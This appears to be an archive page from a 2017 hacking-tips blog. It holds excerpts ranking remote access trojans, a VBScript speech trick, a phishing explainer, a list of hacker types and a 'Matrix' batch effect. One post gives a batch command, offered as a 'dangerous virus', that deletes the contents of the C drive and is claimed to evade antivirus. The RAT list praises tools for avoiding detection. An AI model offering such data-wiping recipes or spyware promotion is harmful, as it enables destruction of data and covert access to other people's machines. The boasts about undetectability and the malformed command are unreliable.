Posts

Showing posts from May, 2017

Top 10 Popular RAT (Remote Access Trojan) of 2017

Image
What is RAT?    RAT means Remote Access Tool or Remote Access Trojan. RAT can be used legally and illegally. Legally used by an administrator to monitor his clients and Illegally by any person to steal or access information of any person without that person knowing. RAT is a very powerful tool capable of doing things that can cause major loss.    #10 : JSPY          JSPY is a java based RAT. The main feature of  JSPY is that it can not be detected by any kind of anti virus. JSPY does the job of a crypter by itself so there is no longer need of crypter. This Rat is not very stable and user friendly that's why it is on number 10. J SPY #9: AndroRAT       AndroRAT is based on client/server connection.This RAT is used to get access of Android only.There is no other RAT to get access of android like AndroRAT. This RAT can give many information about the device and also can run some commands remotely. AndroRat #8: Pandora RAT             Pandora RAT is ava

Is Your Computer Male or Female ?

Image
Do you think what is the gender of your Computer ? This cool trick will tell you about your computer gender whether it is male or female. This trick will work on all Operating System. So Without wasting Time Lets get start !! Just Follow These Simple Steps: Open Notepad and paste the following Code. CreateObject("SAPI.SpVoice").Speak"i love you" Save this file as gender.vbs Now, Open the save file. If you hear Male voice then your computer is male and if you hear Female voice then your computer is female.  I have a Female gender computer !! Try Yours too ?? Share this cool trick with your friends :)

How to Make Dangerous Computer Virus in a Minute ?

Image
In this post i will teach you to make simple yet very powerful or you can say dangerous computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not detected by any AntiVirus. What will this virus do ?    You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming. How to Make the virus ?     1. Open Notepad and copy below code into it. @Echo off Del C:\ *.* |y    2. Save this file as virus.bat (Name can be anything but .bat is must)    3. Now, running this file will delete all the content of C Drive. Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage don

What is Phishing and how to be safe from Phishing ?

Image
What is Phishing ?      Phishing is one of the type of hacking . It is a method of acquiring sensitive information such as username, password, bank information etc. Phishing page could be saif as an duplicate page of real one. Its look exactly similar as the real page.But when user enter sensitive information on such phishing page his information is send to the E-mail address provided in the phishing page or you can say the one who created that phishing page. Phishing page is mostly send via mail. Target of phishing are mostly social networking sites like facebook, orkut etc. Also Banks website to acquire credit card details,website like yahoo, gmail are also target of phishing. Example of Phishing scams: Email asking you to login to your locked account to unlock it.  Email carrying a Link to sites like Facebook,yahoo etc and asking you to Login.  Emails containing some Information of your Interest and asking you to Login to Your Account.  How to be safe from phishing ? N

What is Computer Hacking ? and What are the types of hackers ?

Image
    What is computer hacking?         In a cyber security world, the person who is able to discover weakness in a system and managed to exploit it to accomplish his goal referred as a Hacker , and the process is referred as Hacking. Now a days,  People started think that hacking is only hijacking  Facebook accounts  or defacing websites.  Yes, it is also part of hacking field but it doesn't mean that it is the main part of hacking. So what is exactly hacking, what should i do to become a hacker?!  Don't worry, you will learn it from Break The Security. The main thing you need to become a hacker is self-interest.  You should always ready to learn something and learn to create something new. Now , let me explain about different kind of hackers in the cyber security world. Script Kiddie: Script Kiddies are the persons who use tools , scripts, methods and programs created by real hackers.  In a simple word, the one who doesn't know how a system works but still able

Matrix Falling Code Effect using Notepad

Image
            This trick is an awesome, look like real matrix . It’s inspired by the matrix movie, this is known as falling code trick and it’s extremely popular on social networking websites. At first open notepad and then copy and paste the following code below, and then save it with the file name“Matrix.bat”. Go to your save location and run this file . i). Open notepad >>  Copy and paste following code below: @echo off color 02 :tricks echo %random%%random%%random%%random%%random%%random%%random%%random% goto tricks ii). Then save it as “matrix.bat”. iii). Now go to your save location and run it to see what happen           That's all